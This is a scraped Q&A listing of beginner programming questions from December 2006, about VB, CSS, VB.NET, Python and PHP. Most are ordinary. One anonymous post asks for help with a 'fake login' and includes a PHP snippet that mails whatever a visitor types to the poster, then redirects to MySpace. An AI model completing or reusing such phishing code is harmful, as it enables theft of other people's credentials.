English Deutsch Français Italiano Español Português 繁體中文 Bahasa Indonesia Tiếng Việt ภาษาไทย
All categories

Programming & Design - December 2006

[Selected]: All categories Computers & Internet Programming & Design

I do not know how to cut a long sentence displayed in textboxes or msgboxes.

For example:
msgbox ("This is a very long sentence")

I want to place "long sentence." in next line, what expression is placed between

("This is a very

and

long sentence.").

O' thank you so much.

Worth '5 points' is waiting for those will answer me correctly right away. :-<>

2006-12-18 17:29:59 · 6 answers · asked by Teddie 3

will anyone tell me the book which is easy 2 read & pls tell me the free online tutorial?

2006-12-18 17:18:29 · 4 answers · asked by vijay k 2

2006-12-18 17:08:17 · 2 answers · asked by xinnybuxlrie 5

my wife needs to program a bread board with a cpu to perform addition, subtraction, multiplication, and division. it is for 16 bit. she needs help with the assembler coding and assembling the bread board. the cpu when programmed will light up LEDs to display the input and answers. I am sure this is something that is a final project for a lot of assember classes. if anyone knows what to do, or where to go to get help, please answer.

2006-12-18 16:59:06 · 2 answers · asked by z007039 1

what is extension of files of mysql?

2006-12-18 16:17:34 · 4 answers · asked by far 1

2006-12-18 16:12:22 · 6 answers · asked by shankar l 1

I have a button named browse, i want to click the button and be able to browse to an exe file (or shortcut file). then the path to the browsed to exe file will be inputed into a text box.
im usin vb.net
thanks
mike

2006-12-18 16:02:02 · 2 answers · asked by Anonymous

I want to create a program (in Standard Exe) consists of three forms. The first one is a form for registration, where the user is asked to enter the necessary info's, including the desired username and password, the second is form is for the log-in where you will enter the username and password, and the third one is the main form. My problem is: When the user has inputed the username and password in the registration form, how can i use it as a reference for the second form which is for the log-in?? I mean, how can i passed the variable of the username and password from the register form in to the log-in form, so that i can now proceed to conditional statements whether he/she has inputed them correctly..
Pls, pls pls!! Give me the source code if you know it!!
That's all, and i hope you'll answer it. Thanks!!!

2006-12-18 16:01:41 · 4 answers · asked by bill 2

please explain

2006-12-18 15:59:22 · 9 answers · asked by simonkf2002 1

i have been trying to make a fake login and everything is good except that is does not email me wut they type in. so here is the code i wrote and tell me wut is wrong

$email = $_REQUEST['email'] ;
$message = $_REQUEST['message'] ;

mail( "hiyohi55", "Feedback Form Results",
$message, "From: $email" );
header( "Location: http://viewmorepics.myspace.com/index.cfm?fuseaction=user.viewPicture&friendID=18595918" );
?>

2006-12-18 15:40:29 · 3 answers · asked by Anonymous

should I start to look for clients or should I learn more? I know alot about html and css. Also, how much should I charge for a web site that is not so complicated(like text, links, images, just the basics)?Any suggestions?

2006-12-18 15:23:25 · 6 answers · asked by Anonymous

its at this website: http://www.lghs.net/teachers/math/ljacobson/AP%20Comp%20Sci/Worksheet%20A5.2%20-%20Methods.pdf

2006-12-18 15:18:08 · 2 answers · asked by (: 2

My friend really needs help with this. And I have no idea what any of it is, so if any one could help out in any way, I would really appreciate it!!!

Or if you have a good website too, that would be great. There are no helpful websites out there, at least not one that we've found yet.

So if you know how to make Hangman with Visual Basic, please respond. Thank you! ^_^

2006-12-18 14:48:22 · 1 answers · asked by Kalia 4

2006-12-18 14:42:15 · 3 answers · asked by xinnybuxlrie 5

you can edit photos...i'm getting a digital camera and want to beable to crop and change the photo...like photo shop and put lots of different photos that were takin in the same place into one photo...i've seen it been done..it's so cool

2006-12-18 14:16:29 · 9 answers · asked by lize 4

My contact form has fields (class="text") and I'm trying to make the usual white background color change to a different color when someone clicks inside it (to type). The CSS codes I'm using is below, and it works great in Firefox, but it doesn't in IE6. I can't seem to figure out why !!!! Is there another way I should be doing this in CSS?

input.text {
BACKGROUND: #ffffff;
}
input.text:focus, textarea:focus {
background-color: #f8f8f8;
}

2006-12-18 13:57:34 · 2 answers · asked by only4u 1

And how do I go about installing it or enabling it? An error occurred when I was updating my Itunes, it said that Visual Basics Scripts was not installed or had been disabled, thus preventing the installation from being completed. Please help!!

2006-12-18 12:23:57 · 4 answers · asked by kelreefl 1

I have a preference for Windows or Distibuted. I have a feeling that the current ways of writing Web applications, even with the new stuff like AJAX and such, are short lived and not worth the trouble (but I've been thinking that for a long time).

2006-12-18 12:10:38 · 2 answers · asked by scott 3

it says remove only

2006-12-18 11:54:48 · 3 answers · asked by dirtyrice 1

i want to print out what i type

2006-12-18 11:20:55 · 5 answers · asked by dolllady78 1

This is on a PC

2006-12-18 11:10:58 · 8 answers · asked by Entidine 2

When I go to change my desktop background from the plain blue colour I have now to a picture I always get the blocks of blue surrounding the text under the desktop icons and I can't seem to get rid. Am I missing something?

2006-12-18 10:55:03 · 3 answers · asked by Lee 4

what is your understanding of a variable in the terms of computer programming.

2006-12-18 10:38:27 · 3 answers · asked by g_playa_gent 1

program from vb3 used on Win Me

2006-12-18 10:21:45 · 1 answers · asked by abo_abdullah b 1

If the array is unsorted wouldn't that force you to to search every element in the array. Thus makeing this true because searching every element in an array is done in O(n) time, correct?

2006-12-18 09:17:17 · 3 answers · asked by ff3101 1

i need a free script for my website something in which visitors can fill up the required data field or make selection like radio buttong or drop down list while submit it goes to my email or similar way..
got it...
u can check this link this what i want..

http://www.desertdot.com/quote.php

i try searching in http://www.pscode.com but i didnt found can any body search for me... i will be very thanksfull to u.... and a ten points ofcourse. ;)

2006-12-18 08:51:34 · 4 answers · asked by Anonymous

2006-12-18 08:19:53 · 4 answers · asked by Anonymous

i'm only a begginer so i was looking at "how to get started" list on the web from python website so the first thing i did is downoloaded PythonWin and typed ...print 'Hello World'...later i went to save the document and saved as ...helloworld.py... and under All Documents because that is the only option and clicked RUN but the document i saved isn't anywere on the computer! i have enouh Hard drive space so i dont know what to da help please!

2006-12-18 08:13:54 · 7 answers · asked by pega 2

I have 2 web portals I dont want My Web and now Drop Spam. I have gone into the control panel to delete DropSpam and its Icons, The Icons have disappeared .How do I get rid of the tool bar? I dont even see My Web in the control panel list.

2006-12-18 08:02:05 · 1 answers · asked by Anonymous

fedest.com, questions and answers